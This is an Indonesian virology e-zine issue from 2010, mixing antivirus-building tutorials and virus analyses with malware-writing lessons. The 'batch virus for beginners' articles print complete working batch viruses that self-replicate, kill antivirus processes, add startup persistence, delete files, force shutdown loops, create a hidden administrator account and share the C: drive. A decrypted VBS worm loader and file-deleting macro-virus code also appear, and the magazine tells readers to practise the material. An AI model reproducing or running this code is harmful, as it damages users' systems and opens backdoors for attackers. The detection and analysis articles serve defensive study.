Source Code Fakta Virus Deteksi Virus RunOnce! Source Code Virus Macro Polymorphic

Bagaimana Cara Morphost Mendeteksi Virus Sality ? Temukan Jawabannya Disini !

MorpHo Zine Majalah Resmi MorphostLab

Source Code Deteksi Virus RunOnce! Non-aktifkan Deepfreeze

Fakta Virus

Conficker SmAd-Lock [TIDAK] AMAN

+ Virus Morphirii Sebagai Pembuktian

Trik Scanning File SHORTCUT Tutorial 'melumpuhkan' Komputer yang terdeepfreeze

Source Code

Virus Macro Polymorphic

Belakangan ini muncul virus yang memanfaatkan file shortcut untuk mendukung aksinya. Akan dijelaskan cara pendeteksiannya...

Lebih Jauh Dengan MORPHOSTLAB TEAM Edisi 1 – April 2010 www.MorphostLab.co.nr

Morphozine Edisi 1 - April 2010

Editorial

WELCOME

A

pakah Anda pernah mendengar/tahu tentang Morphost? Kalau pertanyaan itu saya tanyakan 3 tahun yang lalu,

mungkin hampir semua orang akan menjawab "tidak".

Tapi, kalau sekarang, saya yakin, sudah ada yang menjawab "iya".

Well, kami sadari, MorphostLab masih dalam masa perkembangan, belum mencapai final stage. Artinya, kami akan terus melakukan perubahan-perubahan yang tentunya untuk menjadi lebih baik. Muamar Kudo MorphoZine Editor

:)

Jika Anda adalah orang yang tadi menjawab "tidak", maka

dengan membaca Morphozine ini kami berharap Anda bisa lebih

tahu tentang MorphostLab. Tak hanya itu, dalam ebook ini juga telah kami sertakan berbagai artikel menarik khususnya tentang virologi yang bisa Anda praktekkan. Perlu diketahui, segala resiko dan akibat yang terjadi BUKAN menjadi tanggung jawab kami. Use

with your own risk! Mengingat ini adalah edisi pertama, tentunya sangat banyak kekurangan disana-sini. Oleh karena itu, silakan kirim komentar Anda melalui www.morphostlab.co.nr atau email di [email protected] dan [email protected]. Dan inilah pesan dari Morphic Karta [Founder MorphostLab] :

" MorphoZine 100 % ASLI MorphostLab! :) "

Great Thanks to : Allah swt · Rasulullah · My Parents · My 'L' · 2^60 · All Friends · MorphostLab Team (Morphic, Yudha, SatryaCode, Nash, Shafry, Adam, Kholis, Bimo, Revi, etc) · Codenesia · Virologi Indonesia Komunitas VirusIndonesia · Ansaver · Smadaver · All Indonesia AV-maker MorphostLab Visitor·MorphoZine Reader You & Indonesia!

1


Index •

Editorial

1

•

Index

•

Cara Menganalisa Sebuah Worm

2

•

Parameter Command Untuk AntiVirus

•

Encrypt Databasemu!

5

•

Pemrograman Virus Batch Untuk Pemula (Bag 1)

•

Pemrograman Virus Batch Untuk Pemula (Bag 2)

10

•

Bongkar Source Code Virus Vinorika

•

5 Fakta Virus Conficker

15

•

Source Code Virus Macro Polymorphic

•

Cara Praktis Matikan DeepFREEZE

20

•

Trik Scanning File Shortcut!

•

Bobol Smad-Lock!

26

•

Source Code Deteksi Virus RunOnce

•

Bagaimana Cara Morphost Mendeteksi Sality?

32

•

Deteksi Module Sality Tanpa Checksum

•

Our Product : Morphost Expert Plus!

38

•

60 Menit Bersama MorphostLab Team

44

•

Did You Know?

3 7 13 18 24 28 34 41 50

2


Cara Menganalisa Sebuah Worm Ketika pertama kali kita mau menganalisa sebuah PC atau laptop, kita harus tw dulu, apa yg mau kita liat dan periksa baik dr segi proses yg jalan maupun registry yg d rusak. Nah, seandainy kalau kita tdk tahu caranya apa yg mau d buat? A. Di liatin aja komputernya. B. langsung dibinasakan.

C. Belajar bagaimana cara mengetahui adanya virus di komputer. Kalau anda seorang pemula saya yakin anda pasti memilih opsi yg C kan?? Kalau anda tipe seorang analisa keuangan, sudah pasti anda memilih jawaban yg A, krn sama sekali tidak tau. Kalau anda tipenya seperti adik saya, pasti langsung milih opsi B. oke, lantas mas, saya ni milih yg C, gmn cara nya?? Sabar sabar, Gini caranya.

1. coba coba aja buka Taskmgr, cmd, services.msc dan liat di folder option ada tidak pilihan yg paling bawah setelah garis pemisah. Kalau dari semua itu tidak bisa di jalankan baik itu salah satu

atau salah semua dan di folder option itu tidak ada, anda sudah bisa memastikan kalau komputer itu ada virusnya. 2. Setelah coba coba tadi, pastikan kalau tebakan anda benar dengan mulai memeriksa proses yg sedang berjalan di komputer anda, salah satu software yg saya rekomendasikan adalah "Process

Explorer" dari Sysinternals. Saya anggap anda sudah mendownloadnya, terus jalankan applikasi itu.

3. Cek proses apa saja yg berjalan, terus di tandai mana aja yg prosesnya memiliki nama perusahaan dan alamat applikasi itu berada saya berikan contohnya Nama perusahaan Nulsoft (Winamp) Alamat applikasi C:\program files\winamp\winamp.exe nah,

kesimpulannya berarti proses tersebut bukan virus, karna applikasi tersebut berasal dari Nulsoft

yg memang vendor winamp serta alamat prosesny memang berada di tempat installan winamp (program files\winamp\winamp.exe) * jgn terlalu di percaya begitu saja kalau anda belum terlalu mengenal suatu applikasi windows Lalu kalau yg anda periksa tidak memiliki nama perusahaan dan di letakkan di direktori yg agak aneh, Langsung tekan Del pada aplikasi tersebut karena bisa

jadi itu proses virus. * jgn di lakukan jika anda belum terlalu mengenal program program bawaan windows (bisa berakibat fatal)

4. Setelah proses di hentikan, lalu anda jg harus memeriksa StartUp virus tersebut agar ketika

3

Morphozine Edisi 1 - April 2010 komputer itu di restart virus itu tidak aktif lg, software yg saya rekomendasikan "Autoruns" dari Sysinternals, saya anggap anda telah mendownloadnya, terus jalankan software tersebut.

Nah disini saya hanya menjelaskan secara sederhana utk mengenali registry yg telah "di mainkan" oleh si virus. 1. Buka Tab log on, nah masih ingat kan nama proses yg anda matikan td, kalau masih ingat anda

cari nama proses itu di Tab ini dan jgn lupa pastikan alamat file tersebut sama dengan alamat pd proses yg anda matikan td "sama". 2. Buka Tab Image bla bla bla... Saran saya, hapus semua value yg ada di situ. * biasany pd windows yg masih normal di bagian ini selalu kosong

3. Buka Tab services Lakukan dgn langkah yg sama pada langkah ke-1. Sekarang anda telah 70% berhasil mematikan virus itu agar tidak kembali hidup saat komputer di restart. Nah, sekarang bagaimana caranya mencari file file copy an dari virus tsb??

Lihat cara berikut (ni cara kuno) Buka windows find (tekan kombinasi win+f) Nah saya anggap anda tahu cara memakai program ini.

Singkat cerita, saya yakin anda sudah bisa bagaimana menemukan ada tidaknya virus pada sebuah komputer. Pada artikel yg saya tulis ini, anda lah yang harus sering sering melihat proses proses

yg berjalan pd sistem anda, agar anda hapal apa-apa saja applikasi yg biasanya ada pada sistem komputer normal.

salam hangat_ Satryacode

4


Parameter Command Untuk Antivirus

M

udah-mudahan

rasa

penasaran

kalian bisa terobati dengan tutorial

ini. Sebetulnya artikel kali ini gak

terlalu hebat-hebat kali kok. Bagi yang gak penasaran gak usah baca ya. Artikel ini khusus untuk pemula loh. Okey,

kita

mainkan

parameter

command ini di pemrograman visual basic.

Fungsi dari parameter command ini banyak. Misalnya untuk context menu antivirus (klik kanan lalu scan), startup antivirus, dan pc Guard antivirus. Artikel ini termasuk bocoran dari Antivirus Morphost juga sebetulnya. Soalnya di artikel ini

akan dibeberkan code-code parameter command Morphost.

Anggap startup object di project kita, kita set “sub main”, maka code-nya adalah sebagai

berikut;

Sub Main() Select case UCase$(Left$(Command,2)) Case “/S” LokasiFolder = Mid$(Command, 4, Len(Command) -3) ‘lakukan scanning folder. Untuk yang satu ini tergantung pada kalian Exit Sub End Sub Lalu untuk mengaktifkan context menu-nya dibutuhkan code berikut: Sub install() Set wshell = CreateObject(”Wscript.shell”) wshell.regwrite “HKLM\Software\Classes\Folder\shell\Scan with MyAntivirus\command\”, App.Path & “\” & App.EXEName & “.exe” & ” /S %1″ End sub PENJELASAN : Pada “SUB MAIN” di atas terdapat kata “/S”. Itu boleh diganti dengan huruf lain kok, boleh “/D”. Tapi pada “SUB INSTALL” kata “/S” juga diganti dengan “/D” Untuk startup antivirus juga bisa… Dengan startup antivirus ini, antivirus kita bisa aktif

standby dan siap memangsa virus…. Ini nih code-nya:

Sub StartUP() Set wshell = CreateObject(”Wscript.shell”)

5

Morphozine Edisi 1 - April 2010 wshell.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Sampel”, App.Path & “\” & App.EXEName & “.exe” & ” /U %1″ End sub Untuk itu kita perlu tambahkan lagi sedikit code pada “SUB MAIN”. Pada akhirnya code “SUB

MAIN” adalah sebagai berikut:

Sub Main() Select case UCase$(Left$(Command,2)) Case “/S” LokasiFolder = Mid$(Command, 4, Len(Command) -3) ‘lakukan scanning folder. Untuk yang satu ini tergantung pada kalian Case “/U” ‘Lakukan penjagaan dan stand by Exit Sub End Sub Hanya dengan memahami code-code simple ini, banyak parameter command lain yang bisa kalian terapkan pada antivirus kalian.

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/02/26/parameter-command-untuk-antivirus/

6


Encrypt Databasemu ! Ini dia artikel yang mungkin ditunggu-tunggu seseorang…. (baca: anharku). He he he. Oke deh. Inti dari artikel ini Cuma mengencrypt database antivirus aja kok… Bagi yang udah master jangan baca yoo.

Pertama, kita butuh dulu source ato classmodule clsSimpleXOR yang ada di source WAV

Beta. Bagi yang belum punya, tenang aja, udah disertain kok. Buka tuh source code.

Sebetulnya yang kita butuhkan hanyalah source yang ada di classmodule clsSimpleXOR.

Jadi copy paste aja tuh source ke project-mu, okey!

Nih source untuk mengencrypt + mendecrypt: [Misalnya code dalam bagian Form_Load] Private Sub Form_Load() Dim sXor As New clsSimpleXOR ‘bisa juga diketik diluar Form_Load() sXor.Encrypt Environ$(“windir”) & “\file.txt”, Environ$(“windir”) & “\newFile.txt”, “morphic” ‘misalnya kita mau mengencrypt file di “C:\windows\file.txt” dan hasil encrypt ke “C:\windows\newFile.txt” set sXor = nothing End Sub

Ya udah gitu aja, untuk mengencrypt file. Tapi ingat, setelah diencrypt ukuran filenya tidak

7

Morphozine Edisi 1 - April 2010 makin kecil loh.. Biar gak salah pengertian nanti.. he he he. Untuk mendecryptnya:

Private Sub Form_Load() Dim sXor As New clsSimpleXOR ‘bisa juga diketik diluar Form_Load() sXor.DecryptFile Environ$(“windir”) & “\newfile.txt”, Environ$(“windir”) & “\anharku.txt”, “morphic” ‘sekarang kita decrypt lagi hasilnya tadi! set sXor = nothing End Sub Sebetulnya tulisan ”decryptfile” gak masalah kalo diubah jadi ’encryptfile”. Sudah kucoba.

Meskipun kita ubah jadi ”encryptfile” nanti malah akan terdecrypt, soalnya file yang kita encrypt lagi akan terencrypt lagi…. Maksudnya seperti ini:

File Awal -> Diencrypt -> File Terencrypt -> Diencrypt lagi -> File Awal Tapi jangan salah ya… bagan diatas itu HANYA berlaku di code ini saja loh… Susunan code encrypt pada source code ini: sXor.EncryptFile alamat file awal, alamat file hasil, kode Kode yang diisikan terserah. Itulah yang akan dijadikan semacam password! Dalam hal ini

tentu saja sangat berguna buat mengencrypt database kita. Dan yang tahu kode-nya hanya lah kita. He he he. Dalam bahasa lain, yang tahu kode database Morphost Antivirus hanyalah Morphic.

IMPLEMENTASI PADA ANTIVIRUS Sekarang tinggal pengimplementasinya saja pada antivirus. Banyak kali lo guna tehnik

encryption ini tapi aku hanya bisa menjelaskan 7 saja… Kegunaannya antara lain: 1. untuk mengencrypt database

2. untuk mengencrypt file virus di quarantine ato virus fault ato penjara virus. 3. dan

4. masih 5. banyak 6. lagi

7. kegunaannya…. (hehehe) Sekarang supaya antivirus kita bisa mengenali database eksternal yang terencrypt ikuti

langkah berikut:

1. encrypt terlebih dahulu file database

2. pada source antivirus kita, masukkan kode:: - begitu antivirus kita dihidupkan lihat file database. - Decrypt file database tersebut. - Cari file hasil decrypt.

8

Morphozine Edisi 1 - April 2010 - Masukkan data yang ada pada file hasil decrypt tersebut ke dalam antivirus kita (masukkan aja ke dalam Textbox di antivirus kita dengan syarat visible = FALSE) - Hapus file hasil decrypt

- Lanjutkan loading application - Antivirus standby

3. Compile antivirus

4. Tinggal ngeluncurin antirus buatan kita and jangan lupa terus di update databasenya yooo….

Untuk mengencrypt file virus di quarantine dah bisa kalo tutorial diatas sudah dikuasai...

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2008/12/28/encrypt-databasemu/

9


Pemrograman Virus Batch Untuk Pemula (Bagian 1) Kali ini saya akan ajarkan sdikit bagaimana cara membuat virus batch. Dulu virus ini

ngetren sekali (kira-kira tahun 90-an lah). Tapi sekarang ini saya jarang nemuin virus ini berkeliaran…

Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus

VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).

Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla

bla bla is not valid 32 application”. Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….

Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas

kecerobohan kalian… Pertama sekali ketik: @echo off

Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya… Baru setelah itu kita ketik code-code virus lainnya… he he he Ini contoh-contoh code-nya… Untuk meng-kill process yang aktif: Tskill AVGUARD Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi… Contoh lain: Tskill KAV Untuk menghapus file: del C:\Progra~1\Accessories\Calc.EXE Untuk menulis ke regedit: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run REG_SZ /d %systemroot%\Morphix.bat /f

/v

Morphix

/t

Untuk menampilkan messagebox Msg * “Tulis pesanmu disini”

10


Dan masih banyak lagi contoh-contohnya….

Langsung aja neh salah satu virus batch yang saya tulis: ::written by Morphic @ECHO OFF copy %0 %systemroot%\Morphix.bat > nul copy %0 *.bat > nul Attrib +h *.bat cls tskill AVGUARD tskill AVGNT tskill NMAIN tskill KAV tskill ad-aware tskill av* tskill PCMAV reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul cls echo [windows] >> %systemroot%\win.ini echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini Attrib +h %systemroot%\win.ini del C:\docume~\owner\Desktop shutdown -s -t 15 msg * ”Karena sesuatu hal komputer ini harus di-shutdown… Ha ha ha” cls :Morphix start %0 goto Morphix ::*Hanya untuk pembelajaran* mau liat source batch yang lainnya??? Nih virus batch Rawut

@echo off rem c0d3d by Vires @ tegal city

11

Morphozine Edisi 1 - April 2010 rem If u wanna know how this worx rem don’t follow the code from top to bottom rem but follow the flow of code rem is it beautiful???yes it is!!!! rem vires18[at]yahoo[dot]com rem (c)2007,Indonesia rem Dedicated to my Girl:S.S.Latifah(did u knew her b 4???) rem Greetz to all my friends rem cyrus,bdhamas,sat_anichell,einstein2,wau^wau,the_g irl rem xniffer,kang hartono miyabi ,the_simpson,psycopath & all i forget rem sorry!!!!! goto v781i21r1212e23s4c5o677o85l :n56a19m75a0101011 %res%%c00l% %gal%* %gal%bat %l% pulangtegal :t45e18g14a11l %zhe% x=exe %zhe% c=com %zhe% fah=py %l% v25i85r19e0s :l08a80t19i85f08a19h %zhe% sya=att %zhe% gal=*. %zhe% vi=fo %sya%%res%%ah% %gal%* %s% %zhe% ti=co %l% t45e18g14a11l :v25i85r19e0s %zhe% d=txt %zhe% la=do %zhe% m=doc %vi%%res% %%r %te% (%gal%%x% %gal%%c% %gal%%d% %gal%%m% %gal%%lgu%) %la% %ti% %fah% %0 “%%r” %l% n56a19m75a0101011 :v18i17r16e15s %zhe% s=-%vi%s -%vi%r -%vi%h %zhe% res=r %zhe% c00l=en %l% l08a80t19i85f08a19h :v781i21r1212e23s4c5o677o85l set zhe=set %zhe% te=in %zhe% l=goto %zhe% ah=ib %zhe% lgu=mp3 %l% v18i17r16e15s ulangtegal rem Heh,BATCH STILL BEAUTIFUL RIGHT???? rem (c)vires

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/05/08/pemrograman-virus-batch-untuk-pemula/

12


Pemrograman Virus Batch Untuk Pemula (Bagian 2-habis) Saya yakin disekitar anda pasti banyak sekali orang-orang yang sok tahu soal virus. Padahal kamu sendiri adalah VM. He he he.. yah maklum sajalah. Memang banyak sekali orang yang kayak gitu. Ciri-cirinya: •

kalo ngomong soal virus seolah-olah tahu lebih banyak padahal gak tahu apa-apa.

•

sangat mendominasi kalo ngomong soal virus

•

sok memberi info soal virus (padahal info yang dikasih tahunya salah).

•

yang terakhir yang lebih parah, ngomong soal virus didepan kita … (kita = VM). Yah, semua orang pasti pernah ngalaminnya. Ada teman saya yang bilang “kalo virus

dibiarkan lama bisa menyerang semua file”. Ha ha ha… itu omong kosong.

Gak ada hubungannya semakin lama virus dibiarkan bisa menyerang semua file. Yang

benar itu, begitu virus dieksekusi virus akan menjalan semua command yang udah kita

perintahkan. Yah kecuali memang udah ada di pasang penanggalannya. Misalnya tiap tanggal sekian virus akan bla bla bla… yah… begitu…

Yang perlu anda lakukan untuk menghadapi orang-orang seperti itu, kamu gak usah

pamer skill.. yah biarkan aja dia tahu sendiri kalo kamu adalah VM. Dan yang perlu anda lakukan sekarang adalah meningkatkan dan menajamkan skill-mu sebagai VM.

Kalo kamu dah betul2 master di VB ato C++ ato delphi, gak ada salahnya kalo mempelajari

batch juga…

Setelah lama browsing kemana-mana, akhirnya saya udah kumpulkan banyak script virus

batch, dan diantara itu semua saya memilih script berikut. Nama virus ini C_relwarC708 v1.0 yang dibuat oleh Technocrawl’s core member. Makan nih script…

@echo off cd\ cd %SystemRoot%\system32\ md 1001 cd\ cls rem N0 H4rm 15 cau53d unt1| N0w rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000 echo 12:00:00.00 | time >> nul echo 01/01/2000 | date >> nul net users Microsoft_support support /add rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt. net localgroup administrators Microsoft_support /add rem 5h4r3 th3 R00t Dr1v3 net share system=C:\ /UNLIMITED cd %SystemRoot%\system32\1001

13

Morphozine Edisi 1 - April 2010 echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y ) mode con rate=1 > nul mode con delay=4 >> nul rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02 at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs” at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs” msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5 copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs” rem ******************************************************************************** ******************************************************** rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat” rem ******************************************************************************** ******************************************************** cd\ cls rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\ attrib +h +s +r warnusr.vbs attrib +h +s +r sd.bat cd\ cd %systemroot%\system32 attrib +h +s +r 1001 rem K1||5 th3 3xp|0r3r.3×3 Pr0c355 taskkill /F /IM explorer.exe rem @ EOV // End of Virus Yang paling menarik dari script di atas penggunaan message box-nya. Ternyata dari batch juga bisa loh bikin messagebox! Ini nih aturannya: msg * ”ketik pesan anda disini” Simple kan? Ini beda dengan VB yang biasa kamu pake.

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/05/14/pemrograman-virus-batch-untuk-pemula-2/

14


Bongkar Source Code Virus Vinorika Semuanya udah pada tahu tentang vinorika. Apalagi kalo dikaitkan dengan nama “yuyun”, “harrypotter” dan lain-lain. Itu satu paket semuanya. Vinorika ini cukup unik. Alasannya:

1. memanfaatkan file-file shortcut untuk pengeksekusian 2. agak lain dengan virus vbs lainnya.

3. induk-nya hampir tidak memanfaatkan file ”.vbs” (malah hanya menggunakan file ”.db” dan ”.inf” dan ”.lnk”

4. terenkrip!

Tapi sebetulnya gak seluruhnya terenkrip kok. Tubuh virus ini terbagi dua! Bagian pertama

tidak terenkrip sedangkan bagian kedua terenkrip. Bagian pertama isinya sebagai berikut: ‘============================ ‘ Vinorika Go to Kediri…. ‘ Capek dhe!! ‘ Kupersembahkan Sebagai permintaan maafQ bwt Vinurika Rahmania yg ada di Kediri…. ‘ Hanya ini yang bisa Qlakukan…. tapi klo pean masih gk bisa maafin AQ ya mw gmana lgi.. he he! ‘ ‘============================ On Error Resume Next Dim fso, ws Set fso = CreateObject(”scripting.filesystemobject”) Set ws = CreateObject(”wscript.Shell”) Set sh = CreateObject(”Shell.application”) Set net = CreateObject(”wscript.network”) Q=WScript.ScriptFullName tmp=fso.GetSpecialFolder(2) tn=fso.GetTempName tmpt=tmp+”\”+tn Set swt=WScript.Arguments If swt.Count>0 Then status=swt(0) If status=”auto” Then sh.Explore Left(WScript.ScriptFullName,3) Else status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)Len(WScript.ScriptName))+status If fso.FolderExists(status) Then sh.Explore status Else fso.CreateFolder status sh.Explore status End If End If Else

15

Morphozine Edisi 1 - April 2010 End If Set QQ=fso.GetFile(Q) Set Q1=QQ.OpenAsTextStream(1,0) isiQ=Q1.Read(QQ.Size) Q1.close t1=InStr(1,isiQ,”Vinorika~!~2008″+” >>>”,0)+18 isiQ=Right(isiQ,Len(isiQ)-t1) hsl=”" For v=1 To Len(isiQ) t=Asc(Mid(isiQ,v,1)) hsl=hsl+Chr(t Xor 5) Next If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0 Set temporary=fso.OpenTextFile(tmpt,2,True,0) temporary.Write hsl temporary.Close ws.Run “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”"”" ’————berakhir disini——— Kalo bagian pertama ini bisa aja dilihat kalo file ”thumbs.db” direname jadi ”.txt”. Dan

semua orang bisa melakukan hal ini. Oke. Oke. Ini semua belum berakhir teman…

Bagaimana dengan bagian kedua??? Bagian kedua terenkrip. Ada satu baris yang

membedakan dua bagian ini. Yaitu : ” ‘ Vinorika~!~2008”

Si virus maker sengaja memberikan tanda untuk membedakan kedua bagian supaya ketika

virus dieksekusi si virus tahu mana source yang harus didekrip. Nah, kebetulan source yang dienkrip itu sudah aku dekrip kemarin. Tapi untuk bagian yang kedua, dengan terpaksa tidak bisa

ditampilkan langsung disini karena skripnya yang cukup panjang. Tapi tenang saja, udah disertakan kok. Hehe

Terus terang aja, setelah aku mendekrip semua source dibawah ini aku sanggup membuat

vinorika tiruan. Dan aku yakin kalian semua pun bisa. Kalau kalian cuma merename file induk virus dari "thumb.db" menjadi "thumb.txt" mungkin source diatas gak mungkin bisa kalian temukan.

Dulu, Morphost udah bisa memberantas file-file shortcut buatan vinorika. Tapi ada

kelemahannya! Yaitu FalseAlarm! Namun, sejak versi Accords, Morphost udah bisa mendeteksinya dengan baik tanpa false Alarm sedikitpun! Kalian juga bisa. Hanya butuh satu string saja kok!

Tapi yang jadi masalah gimana menemukan string yang cocok? File ”.lnk” (file shortcut) gak

bisa direname jadi ”.txt”. Terus kalo file shortcut-nya dibuka pake Notepad++ yang muncul malah isi file “wscript.exe”

Jadi yang mana yang benar? Kemarin aku pake cara ini (Ingat, gantikan 'fileshortcut'

dibawah menjadi alamat file shortcut virus vinorika) Open fileshortcut For Binary As #1 filedata = Space$(LOF(1)) Get #1, , filedata Close #1 Open ”D:\sampel.txt” for binary as #1 Put #1,, filedata Close #1

Lalu setelah dijalankan, coba lihat file “D:\sampel.txt”. nah itulah isi perut sesungguhnya

16

Morphozine Edisi 1 - April 2010 dari file shortcut Vinorika. Lalu untuk penerapannya pada antivirus? Silakan ambil string yang paling kamu curigai.

Kalau aku sendiri pake string: 777363726970742E657865 (dalam bentuk hexadecimal.

Silakan ubah sendiri ke bentuk ASCII) Dan aku sendiri yakin string yang satu ini cukup ampuh dijadikan signature. Sekian dulu.

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/08/22/source-code-virus-vinorika/

17


5 Fakta Virus Conficker Setelah aku teliti, ternyata ada beberapa fakta pada virus conficker.

1

Conficker menulari flashdisk dengan 2 file dan 2 folder. Kalau yang satu ini aku rasa semua udah pada tahu. Ada dua file dan ada dua folder. Kedua file yang dimaksud adalah autorun.inf dan jwgkvsq.vmx. Dua folder yang dimaksud adalah “RECYCLER” dan “S-5-3-

42-2819952290-8240758988-879315005-3665” yang berada di dalam folder “Recycler”.

Dan perlu ditekankan sekali lagi bahwa conficker berbeda dengan virus Recycler.

Kesamaan antara kedua virus ini adalah keduanya sama-sama membuat folder “Recycler”

2

Ukuran kedua file milik Conficker mudah ditebak! Inti dari fakta kedua ini: file autorun.inf milik Conficker selalu di atas 55KB. Dan umumnya berukuran 58Kb. File jwgkvsq.vmx milik Conficker selalu di atas 150 KB. Dengan adanya fakta kedua ini, banyak AV yang

sudah bisa menghajar varian-varian conficker yang datangnya dari flashdisk.

Smad*V juga memanfaatkan peluang ini. Tentunya file jqgkvsq.vmx yang ada di

flashdiskmu pasti terdetek. Tapi kalo file itu direname, pasti smad*v tidak mendeteknya sebagai virus. Sebenarnya begitu juga dengan Morphost.

3 4

Virus Conficker adalah virus yang lebih abstrak. Semua sudah tahu kalo virus komputer adalah hal yang abstrak. Kalo conficker ini lebih dari abstrak. Komputer yang sudah

sempat terinfeksi, kalo discan pake AV lokal (termasuk morphost juga), pasti si conficker

gak ketemu. Sementara kalo di flashdisk pasti terdetek.

Flashdisk yang terinfeksi mudah dibersihkan. Jangan anggap remeh fakta yang keempat ini. Biasanya kalo flashdisk kita bervirus, pastinya kita membersihkan flashdisk kita d

komputer lain yang bersih. Tapi khusus untuk conficker, flashdisk kita yang udah sempat

kena inipun bisa dibersihkan di komputer yang memang sudah terinfeksi conficker.

Sederhananya flashdisk kita yang bervirus bisa dibersihkan secara langsung di komputer

korban. Cukup hapus kedua file conficker! Untuk buktinya bisa cek di komputer yang bersih!

5

Conficker akan mati jika svchost.exe juga mati! Ini adalah penelitian terakhir kami (MorphostLab). Setelah kami cek, ternyata svchost.exe punya peranan penting bagi conficker. Kesimpulan sederhananya conficker bergantung hidup pada svchost.exe Kami pastikan bahwa conficker sendiri punya services di komputer korban. Namun tidak

jelas services yang mana. (Mungkin beberapa dari pembaca ada yang sudah tahu services milik conficker). Di Servives Management Console (Services.msc) ada banyak services yang berstartup ”svchost.exe”.

18

Morphozine Edisi 1 - April 2010 Supaya lebih pasti kami merename langsung key regedit svchost. HKLM\software\microsoft\windows NT\currentversion\svchost Setelah komputer direstart, conficker akan mati. Setelah komputer direstart akan ada

dampak-dampakanya. •

startup makin lambat.

•

tampilan welcome dan munculnya desktop sangat lambat sekali.

•

tampilan XP akan berubah menjadi tampilan windows 98.

•

pada task manager tidak ada process ”SVCHOST.exe”

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2009/10/22/552/

19


Source Code Virus Macro POLYMORPHIC

A

dakah virus macro yang ber-polymorphic? Hampir semua virologist sudah pada tahu apa maksudnya virus polymorphic. Virus yang mengubah strukturnya dan biasanya untuk meloloskan diri dari deteksi antivirus.

Kalo polymorphic pada file “.exe”, “.bat”, “.vbs” dan lainnya yah biasa…. Kalo macro? Virus

yang ditulis dengan Microsoft office bisa kan berpolymophic? Bagaimana caranya? Penuh tanda tanya memang!

Sebenarnya alasan utama melakukan polymorphic adalah untuk pertahanan diri. Untuk itu

sebelum masuk ke cerita virus macro polymorphic, kita bicarakan dulu pertahanan yang dilakukan virus Macro…

Dari sekian banyak pertahanan virus macro, ini lah cara yang paling mudah! SendKeys “%” + “F4” Kenapa? Karena itu sama aja tekan tombol Alt+F4. Tapi ada kelemahannya! Terkadang muncul window atau prompt yang mengingatkan untuk men-save kembali. Kalo mau Ctrl+alt+del SendKeys “^” + “%” + “-” Kalo yang mau lebih keren lagi ini… ThisDocument.Close Buka VisualBasicEditor yang ada di Ms.Word dengan menekan tombol Alt+F11. Setelah itu,

ketik disitu: Private Sub Document_Open() ThisDocument.Close End Sub

Kalau source itu yang kita gunakan, malah begitu hidup langsung nutup tuh document.

Alias kita gak akan bisa membuka file document kita. Kalo mau yang lebih keren lagi ini… Private sub Document_Open() ActiveDocument.Close End Sub

Malah semua document yang aktif malah tertutup tuh tanpa kompromi. Memang macammacam pertahanan virusmacro, ada juga pertahanan dengan menghapus file, lihat source berikut: Kill”C:\Autoexec.bat” Kill”C:\Config.sys” Kill”C:\Command.com” Kill”C:\io.sys” Kill”C:\msdos.sys”

20

